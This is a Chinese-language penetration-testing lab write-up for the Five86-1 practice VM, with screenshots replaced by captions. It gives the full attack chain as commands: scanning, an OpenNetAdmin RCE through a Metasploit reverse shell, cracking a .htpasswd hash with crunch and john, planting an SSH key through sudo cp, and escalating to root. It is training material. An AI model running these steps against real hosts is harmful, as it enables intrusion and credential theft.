过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147
渗透测试学习之靶机Five86-1

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.147
    渗透测试学习之靶机Five86-1
    2个http端口,80是Apache,10000那个查一下:
    渗透测试学习之靶机Five86-1
  • web站点相关服务信息
    80Apache下的站点:
    渗透测试学习之靶机Five86-1
    10000端口下的集成环境:
    渗透测试学习之靶机Five86-1
    服务信息看不出啥
  • 目录信息
    直接使用kali里的dirb:
    dirb http://192.168.246.147
    渗透测试学习之靶机Five86-1
    打开robots.txt:
    渗透测试学习之靶机Five86-1
    打开ona:
    渗透测试学习之靶机Five86-1
    搞不懂这是个啥,百度:
    渗透测试学习之靶机Five86-1
    看一下版本:
    渗透测试学习之靶机Five86-1
3. RCEgetshell

kali里搜一下相关漏洞:
searchsploit opennetadmin
渗透测试学习之靶机Five86-1
刚刚好对应上了RCE。
进入该目录,然后./47691.sh http://192.168.246.147/ona/login.php
一直报错,中途进去删了空行,没改回原来的样子,大致是这样:
渗透测试学习之靶机Five86-1
至于login.php是怎么找到,点击右上角的logout后,出现logout.php,试下login.php就出现登录界面。
漏洞库找下EXP,看到个msf版的:
渗透测试学习之靶机Five86-1
下载后拉进kali,我放的位置是/usr/share/metasploit-framework/modules/exploits/unix/
渗透测试学习之靶机Five86-1
然后在msf里重新加载,reload_all
渗透测试学习之靶机Five86-1
使用该exp:use exploit/unix/47772
查看所需配置:show options
渗透测试学习之靶机Five86-1
设置目标IP,反弹IP:
set rhosts 192.168.246.147
set srvhost 192.168.246.138
set lhost 192.168.246.138
渗透测试学习之靶机Five86-1
expolit
渗透测试学习之靶机Five86-1
shell后,获取交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
渗透测试学习之靶机Five86-1
进入html目录,查看文件:
渗透测试学习之靶机Five86-1
渗透测试学习之靶机Five86-1
根据.htaccess里的提示找到.htpasswd:
cd /var/www
ls -la
cat .htpasswd
渗透测试学习之靶机Five86-1
是一个用户的账户密码,提示密码10位数且只有aefhrt这些字符,用crunch生成字典:
crunch 10 10 aefhrt -o /root/Desktop/dic.txt
渗透测试学习之靶机Five86-1
将.htpasswd中的密码保存到文件中,使用生成的字典john**一下:
john --wordlist=/root/Desktop/dic.txt /root/Desktop/86-1.txt
渗透测试学习之靶机Five86-1
得到密码:fatherrrrr
切换到douglas用户,然后查看权限:
渗透测试学习之靶机Five86-1
/bin/cp也就是copy命令可以使用Jen用户权限免密执行,在douglas下,看到隐藏的.ssh,那么把它cp到jen目录下就可以使用ssh**登录jen了:
渗透测试学习之靶机Five86-1
Linux**登录原理和ssh使用**实现免密码登陆
将公钥复制到jen里:
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
渗透测试学习之靶机Five86-1
登录:
ssh [email protected]
渗透测试学习之靶机Five86-1
登录上就提示You have new mail.
查看
cd /var/mail
ls
cat jen
看到一篇挺长的邮件:
渗透测试学习之靶机Five86-1
重点在这里:
渗透测试学习之靶机Five86-1
moss的密码是Fire!Fire!
切换用户:
cd
ls -la
来到moss的目录下看到隐藏的games:
渗透测试学习之靶机Five86-1
进入该目录后查看文件,有个root:
渗透测试学习之靶机Five86-1
打开看后是乱码,然后执行一下就蹦出了这个:
渗透测试学习之靶机Five86-1
直接进入root目录,找到flag.txt:
渗透测试学习之靶机Five86-1

总结
  • 扩展起来挺多东西的。

相关文章: